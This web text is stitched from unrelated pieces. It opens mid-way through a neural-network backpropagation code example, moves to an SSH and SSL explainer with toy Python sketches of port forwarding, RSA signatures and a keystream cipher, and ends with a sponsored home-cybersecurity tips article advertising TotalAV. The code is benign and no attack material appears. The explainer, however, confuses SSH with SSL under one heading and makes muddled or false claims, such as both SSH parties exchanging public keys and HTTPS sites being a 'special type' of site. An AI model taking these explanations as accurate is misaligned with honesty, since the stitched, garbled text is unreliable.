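        h, y = forward(x)
        # Back propagation: the output error is pushed backwards, layer by
        # layer, to compute each connection strength's correction.
        d_out = (y - t) * y * (1 - y)                       # output-layer error
        d_hid = [d_out * w_o[j] * h[j] * (1 - h[j]) for j in range(2)]
        for j in range(2):
            w_o[j] -= lr * d_out * h[j]
            for i in range(2):
                w_h[j][i] -= lr * d_hid[j] * x[i]
            b_h[j] -= lr * d_hid[j]
        b_o -= lr * d_out

loss_after = mse()
print(loss_before, "->", loss_after)  # the loss drops as the network learns
```

"Deep" learning is this same procedure with many more layers and vastly more data, which is exactly what modern computing power made practical.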
Secure Shell Protocol is a cryptographic network protocol for operating network services securely over an unsecured network.
What is SSH?
Secure Shell (SSH) is a network protocol that gives users a secure way to access a computer over an unsecured network.
It uses public-key cryptography and can be configured in such a way as to allow only certain people or machines to connect to your system. This makes it useful when you want to restrict who has access to what information.
The most common use of SSH is remote administration: logging in to a server over an encrypted channel, often with key-based authentication, rather than sending a username and password in the clear as older protocols like Telnet did. You may also need to configure permissions so that only specific users are allowed to perform actions such as changing files.
What are some common uses for SSL?
SSL encrypts data that travels across networks like the internet. The most obvious example is web browsing, where information such as credit card numbers would otherwise travel through unencrypted channels before reaching its destination. If someone intercepted those messages, they could steal all sorts of sensitive information. For instance, hackers might try to pull usernames and passwords out of a browser cache, or even attempt to hijack accounts using stolen credentials.
How does SSL protect my personal info?
When we connect to websites via HTTPS instead of HTTP, we're actually connecting to a special type of website called a "secure site." These sites have been specially configured so that only authorized users will ever see what’s going on behind the scenes. When we visit a secure site, we'll notice that there's usually a lock icon somewhere in our browser window. That means everything we send back and forth has been secured against eavesdropping.
SSL encrypts data sent across networks so that anyone snooping along the way cannot read what was said. The most obvious example of this would be using HTTPS instead of HTTP when browsing websites. If someone intercepts traffic while it’s traveling through the Internet then all they will see is garbled text. They won't know whether there is any sensitive information contained within those messages.
The main reason why we use SSL encryption is that it provides us with security against eavesdropping attacks. We don't want our communications intercepted by third parties who may have malicious intentions. For instance, if I'm sending confidential financial documents via email, I'd rather encrypt them because hackers could potentially steal my money if they stole the data via unencrypted channels.
How does SSH differ from FTP?
FTP stands for File Transfer Protocol. It's one of many protocols which enable file transfers over TCP/IP connections. In contrast, SSH enables secure shell sessions over TCP/IP connections; hence the name Secure SHell.
In addition to providing authentication services, SSH offers other features including:
Encryption – Data transferred over SSH is protected using symmetric key algorithms. Symmetric keys are secret values shared between both ends of the connection. This prevents unauthorized access to your private data.
Authentication – Users can authenticate themselves to each other securely without having to share secrets or passphrases.
Port forwarding – Lets you tunnel other TCP connections through the encrypted SSH session, for example exposing a service running on a remote machine through a port on your local computer.
Remote command execution – Enables administrators to execute commands on remote machines.
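Port forwarding is easiest to understand as a relay. The sketch below implements just the relay plumbing with Python sockets, handling a single client connection. A real `ssh -L 8080:target:80 user@host` does the same relaying but carries the bytes inside the encrypted SSH channel; this sketch shows only the plumbing, without any encryption.

```python
import socket
import threading

def _pipe(src, dst):
    """Copy bytes from src to dst until EOF, then signal shutdown."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def start_forwarder(target_host, target_port, listen_port=0):
    """Listen on a local port and relay one client's traffic to the target.

    Returns the local port number (listen_port=0 lets the OS pick one).
    """
    listener = socket.create_server(("127.0.0.1", listen_port))
    port = listener.getsockname()[1]

    def accept_and_relay():
        client, _ = listener.accept()
        upstream = socket.create_connection((target_host, target_port))
        # One thread per direction: upstream->client and client->upstream.
        t = threading.Thread(target=_pipe, args=(upstream, client), daemon=True)
        t.start()
        _pipe(client, upstream)

    threading.Thread(target=accept_and_relay, daemon=True).start()
    return port
```

A production forwarder would accept many concurrent clients and, like SSH, encrypt the leg of the journey between the two endpoints.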
Why Is SSH Key Management So important?
Private vs Public SSH Keys
When generating an SSH keypair, there are two types of keys available: private and public. A private key is kept secret by its owner while a public key is made publicly accessible through various methods such as emailing it to others, publishing it online, etc. When connecting to a remote system, both parties exchange their respective public keys to validate each other’s identities. If either party doesn't have the matching private key, then no connection can be established.
Public-key cryptography uses asymmetric techniques to ensure authenticity. Asymmetry refers to the fact that every user possesses a unique pair of keys: a private key, which is kept secret and never shared with anybody, and a public key, which can be distributed freely. Only the holder of the private key can produce a valid signature, but anyone possessing the corresponding public key can verify that signature and thus confirm the identity of the sender.
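A toy signature scheme makes the asymmetry concrete. The sketch below uses "textbook RSA" with tiny primes purely for illustration; real SSH keys use 2048-bit or larger moduli (or Ed25519) and properly padded signatures, so do not use anything like this in practice.

```python
import hashlib

# Toy "textbook RSA" with tiny primes -- for illustration only.
p, q = 61, 53
n = p * q                    # public modulus (part of the public key)
phi = (p - 1) * (q - 1)
e = 17                       # public exponent (part of the public key)
d = pow(e, -1, phi)          # private exponent -- never shared (Python 3.8+)

def sign(message: bytes) -> int:
    """Only the private-key holder can produce this value."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(digest, d, n)

def verify(message: bytes, signature: int) -> bool:
    """Anyone holding the public key (n, e) can check the signature."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == digest

sig = sign(b"login request from alice")
print(verify(b"login request from alice", sig))   # True
# A tampered message almost certainly fails to verify (with such a tiny n,
# digest collisions mod n are possible, so it is not printed as certain):
print(verify(b"login request from mallory", sig))
```

This is the pattern behind SSH key authentication: the server challenges the client, the client signs with its private key, and the server verifies against the stored public key.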
What Encryption Algorithm Does SSH Use?
SSH uses symmetric ciphers to encrypt the session. Historically, common choices included DES, 3DES, and AES. DES and 3DES operate on 64-bit blocks of plaintext and ciphertext, while AES operates on 128-bit blocks.

AES has long been the preferred algorithm in modern SSH implementations such as OpenSSH, with DES and 3DES now considered obsolete. One advantage of AES is that it requires less CPU power than the older algorithms.

Because a block cipher processes data one block at a time, encrypting large amounts of data can still become a bottleneck. To overcome this, some implementations process multiple blocks in parallel (for example, in counter mode or across multiple threads), and many modern CPUs provide dedicated AES instructions.
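The symmetric idea, one shared key that both encrypts and decrypts, can be sketched with a hash-based keystream. This is a CTR-mode-style toy, not a real AES implementation, and the key and message values are invented for illustration.

```python
import hashlib

def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Derive a keystream by hashing key||nonce||counter (a CTR-style sketch)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Symmetric: the exact same key and function encrypt AND decrypt."""
    ks = keystream(key, nonce, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

key = b"session-key-agreed-during-handshake"   # both sides hold this secret
nonce = b"\x00\x00\x00\x00\x00\x00\x00\x01"    # must never repeat per key
ciphertext = crypt(key, nonce, b"scp backup.tar.gz complete")
plaintext = crypt(key, nonce, ciphertext)      # the same call undoes it
print(plaintext)  # b'scp backup.tar.gz complete'
```

Counter mode also shows why parallelism helps: each block of keystream depends only on the counter value, so independent blocks can be computed on separate threads or cores.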
You might think you have a solid cybersecurity plan. Maybe you use strong passwords and defensive measures like VPNs and firewalls. But even the strongest shield gets dented from time to time.
That’s why it’s good to brush up on the basics every so often. There are countless threats you need to watch out for. After all, the AV-TEST Institute alone says it detects over 450,000 new malicious programs every day.
We put together some easy mistakes you might be making right now. You might discover a weakness that puts you and your computer in danger. Thanks to our sponsor, TotalAV, you can scroll down to stay safe!
1. Leaving your Wi-Fi network or router unprotected
Few things make a cybercriminal salivate more than an unsecured Wi-Fi connection. It’s a simple way for them to steal a little broadband.
If they feel particularly nefarious, they can even use your network to attack your gadgets. How about stealing your personal information? They could even download dangerous files or visit illegal websites through your router.
Weak Wi-Fi protections put the lives of one British couple on pause — right in the middle of the pandemic. They couldn’t work or support their children. According to BBC, a monster used their Wi-Fi connection to upload child abuse material to an online chat site. That led the police straight to their front door.
Don’t let that be you! Step one: Create an original password that’s hard to crack. After that, we have a few more helpful tips for you. Tap or click here to lock down your Wi-Fi and protect your home.
While you’re at it, make sure your router also has a strong, secure and unique password. You’re not alone if you haven’t considered your router a vulnerability. Two years ago, the United States Computer Emergency Readiness Team alerted Americans about Russian hackers attacking “a large number of” home routers in the U.S.
This wasn’t a one-off thing, either. Router attacks are anything but rare. Tap or click here for five essential router security settings you need to check now.
2. Using the same PIN for your phone lock screen as your bank
We get it. You don’t want to remember different number codes. They’re easy to forget, so you want to keep it simple and reuse the same PIN.
Don’t give in to temptation. It could lead you to financial ruin. Say you’re relaxing in the coffee shop, and you open your phone. Someone standing behind you could notice your code, write it down and start using it to access your bank account within minutes.
To protect yourself, use different PINs. If you’re struggling to remember them all, consider a password manager. Tap or click here for more details on this easy trick.
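If you want to see what "strong and different" looks like in practice, Python's `secrets` module generates cryptographically strong random values, which is essentially what a password manager does for you. The lengths and character set here are illustrative choices.

```python
import secrets
import string

def random_pin(length: int = 6) -> str:
    """A fresh numeric PIN -- generate a different one for each account."""
    return "".join(secrets.choice(string.digits) for _ in range(length))

def random_password(length: int = 16) -> str:
    """A strong random password, like a password manager would create."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(random_pin())       # e.g. '508214' (different every run)
print(random_password())  # e.g. 'q7K!fZ2m0pW9bR4x' (different every run)
```

Unlike the `random` module, `secrets` is designed for security-sensitive randomness, so the output is not predictable from previous values.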
3. Clicking ads and downloading what you find on the page
This is an easy way to hurt your computer. If you see an item you like in an ad, it’s best not to click it. You are better off heading to your search bar and visiting the brand website itself. There, search for the item in the ad.
Sure, it requires a few extra steps, but it’s better to be safe than sorry. After all, it’s super easy for cybercriminals to create malicious ads. They might even masquerade as authentic companies to get your guard down.
That’s why you shouldn’t click on ads, even if they look safe and legitimate. Instead, find the source yourself.
Bonus: Not protecting your devices with antivirus software
Cyberattacks are on the rise, and the more we rely on our devices for work, school and personal lives, the more we have to lose. Whether it’s bank accounts, personal data, photos or conversations, there’s just so much to preserve and protect. That’s why I recommend TotalAV.
TotalAV’s industry-leading security suite is easy to use and offers the best protection in the business. It has received the renowned VB100 award for detecting more than 99% of malware samples for the last three years in a row.
Not only do you get continuous protection from the latest threats, but its AI-driven Web Shield browser extension blocks dangerous websites automatically. And its Junk Cleaner can help you quickly clear out your old files.
Right now, get an annual plan of TotalAV Internet Security for only $19 at ProtectWithKim.com. That’s over 85% off the regular price! | <urn:uuid:e7ef508b-ec9c-46ac-840e-b713433f6890> | CC-MAIN-2022-40 | https://www.komando.com/tech-tips/mistakes-putting-you-at-risk-online/807337/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00755.warc.gz | en | 0.913555 | 972 | 2.65625 | 3 |